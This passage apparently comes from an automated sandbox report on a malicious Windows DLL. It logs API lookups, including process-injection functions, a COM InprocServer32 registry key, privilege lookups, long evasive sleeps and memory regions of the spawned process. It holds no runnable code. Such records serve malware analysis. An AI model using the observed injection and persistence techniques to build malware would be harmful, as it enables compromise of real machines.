| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
5 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
5 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
5 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
2 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
2 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = OpenProcessToken, address_out = 0x76714304 |
|
5 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetTokenInformation, address_out = 0x7671431c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x767140e6 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EqualSid, address_out = 0x7671410b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = FreeSid, address_out = 0x7671412e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CheckTokenMembership, address_out = 0x7670df04 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeZoneInformation, address_out = 0x76208a3b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x762265c4 |
|
1 | |
| Get Address | c:\windows\system32\iphlpapi.dll | function = GetAdaptersInfo, address_out = 0x74139263 |
|
1 | |
| Get Address | c:\windows\system32\iphlpapi.dll | function = GetPerAdapterInfo, address_out = 0x7413d3b8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileTime, address_out = 0x7620be16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileTime, address_out = 0x76210f6f |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = realloc, address_out = 0x7772b10d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = sprintf, address_out = 0x7773d354 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = srand, address_out = 0x7772f757 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = rand, address_out = 0x7772c070 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnprintf, address_out = 0x7772d1a8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strtok, address_out = 0x7772df1f |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strcmp, address_out = 0x77738b11 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateNamedPipeW, address_out = 0x7620270f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x7621cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetNamedPipeHandleState, address_out = 0x7622f420 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x7621bccc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOverlappedResult, address_out = 0x76212f04 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ConnectNamedPipe, address_out = 0x76202727 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76207f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x7622f438 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenEventW, address_out = 0x7621548b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x7621bcb4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x7621ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x7622214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x7621bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x7620eb36 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestExA, address_out = 0x76691812 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpQueryInfoA, address_out = 0x7661a33e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectA, address_out = 0x766249e9 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7661b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetWriteFile, address_out = 0x766346da |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestA, address_out = 0x76624c7d |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpEndRequestA, address_out = 0x766345ea |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7661dcd2 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestA, address_out = 0x766918f8 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenA, address_out = 0x7662f18e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7661ab49 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetQueryOptionA, address_out = 0x76611b56 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetSetOptionA, address_out = 0x766175e8 |
|
1 | |
| Get Address | c:\windows\system32\urlmon.dll | function = ObtainUserAgentString, address_out = 0x77861d76 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExA, address_out = 0x767148ef |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateRemoteThread, address_out = 0x7625f33b |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteProcessMemory, address_out = 0x7620c1de |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenProcess, address_out = 0x762159d7 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadProcessMemory, address_out = 0x7620c1ce |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessW, address_out = 0x761d204d |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAllocEx, address_out = 0x7620c1b6 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFreeEx, address_out = 0x7620c1ee |
|
4 | |
| Get Address | c:\windows\system32\psapi.dll | function = EnumProcessModules, address_out = 0x77c71408 |
|
4 | |
| Get Address | c:\windows\system32\psapi.dll | function = EnumProcessModulesEx, address_out = 0x77c715de |
|
4 | |
| Get Address | c:\windows\system32\psapi.dll | function = GetModuleBaseNameW, address_out = 0x77c7152c |
|
4 | |
| Get Address | c:\windows\system32\psapi.dll | function = EnumProcesses, address_out = 0x77c71544 |
|
4 | |
| Get Address | c:\windows\system32\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x767141b3 |
|
4 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x7671418e |
|
4 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtCreateThreadEx, address_out = 0x77f05728 |
|
4 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCICreate, address_out = 0x72dc8e91 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIAddFile, address_out = 0x72dc8cd4 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIFlushCabinet, address_out = 0x72dc8db8 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIFlushFolder, address_out = 0x72dc8e16 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIDestroy, address_out = 0x72dc8e46 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDICreate, address_out = 0x72dc1c3f |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDIIsCabinet, address_out = 0x72dc59bd |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDICopy, address_out = 0x72dc1849 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDIDestroy, address_out = 0x72dc1693 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCICreate, address_out = 0x72d78e91 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIAddFile, address_out = 0x72d78cd4 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIFlushCabinet, address_out = 0x72d78db8 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIFlushFolder, address_out = 0x72d78e16 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FCIDestroy, address_out = 0x72d78e46 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDICreate, address_out = 0x72d71c3f |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDIIsCabinet, address_out = 0x72d759bd |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDICopy, address_out = 0x72d71849 |
|
1 | |
| Get Address | c:\windows\system32\cabinet.dll | function = FDIDestroy, address_out = 0x72d71693 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 4 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | filename = C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | filename = C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | filename = C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | filename = C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | filename = C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | filename = C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | - | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Map | - | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_READ |
|
1 |
User (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
4 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = zQWwe2esf34356d, wndproc_parameter = 0 |
|
1 |
System (240)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = CRH2YWU7 |
|
10 | |
| Sleep | duration = 10000 milliseconds (10.000 seconds) |
|
2 | |
| Sleep | duration = 430000 milliseconds (430.000 seconds) |
|
1 | |
| Sleep | duration = 86400000 milliseconds (86400.000 seconds) |
|
1 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
103 | |
| Sleep | duration = 4305000 milliseconds (4305.000 seconds) |
|
1 | |
| Sleep | duration = 4884000 milliseconds (4884.000 seconds) |
|
1 | |
| Sleep | duration = 4700000 milliseconds (4700.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94099 |
|
1 | |
| Get Time | type = Ticks, time = 104255 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:34 (UTC) |
|
2 | |
| Get Time | type = Local Time, time = 2018-04-29 11:06:44 (Local Time) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:45 (UTC) |
|
5 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:46 (UTC) |
|
4 | |
| Get Time | type = Ticks, time = 116220 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:59 (UTC) |
|
23 | |
| Get Time | type = Ticks, time = 129153 |
|
1 | |
| Get Time | type = Local Time, time = 2018-04-29 11:07:01 (Local Time) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:01 (UTC) |
|
3 | |
| Get Time | type = Ticks, time = 130791 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:02 (UTC) |
|
5 | |
| Get Time | type = Ticks, time = 132522 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:12 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:13 (UTC) |
|
3 | |
| Get Time | type = Ticks, time = 142787 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:14 (UTC) |
|
4 | |
| Get Time | type = Local Time, time = 2018-04-29 11:07:14 (Local Time) |
|
1 | |
| Get Time | type = Ticks, time = 144456 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:16 (UTC) |
|
5 | |
| Get Time | type = Ticks, time = 145860 |
|
1 | |
| Get Time | type = System Time, time = 1627-01-31 12:49:21 (UTC) |
|
6 | |
| Get Time | type = Ticks, time = 156125 |
|
1 | |
| Get Time | type = System Time, time = 1627-01-31 12:49:26 (UTC) |
|
4 | |
| Get Time | type = Local Time, time = 2018-04-29 11:07:31 (Local Time) |
|
1 | |
| Get Time | type = Ticks, time = 161008 |
|
1 | |
| Get Time | type = System Time, time = 1627-01-31 12:49:27 (UTC) |
|
5 | |
| Get Time | type = Ticks, time = 162506 |
|
1 | |
| Get Time | type = System Time, time = 1627-01-31 12:49:37 (UTC) |
|
6 | |
| Get Time | type = Ticks, time = 172599 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:44 (UTC) |
|
4 | |
| Get Time | type = Local Time, time = 2018-04-29 11:07:44 (Local Time) |
|
1 | |
| Get Time | type = Ticks, time = 174565 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:45 (UTC) |
|
5 | |
| Get Time | type = Ticks, time = 175111 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
3 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 | |
| Get Environment String | name = USERNAME, result_out = EEBsYm5 |
|
1 | |
| Get Environment String | name = ALLUSERSPROFILE, result_out = C:\ProgramData |
|
7 |
Process #9: gorctexxzx.exe
127
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xab8 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
ABC
0x
DE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00317fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0118ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0128ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012f0000 | 0x012f0000 | 0x012fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000014c0000 | 0x014c0000 | 0x015bffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
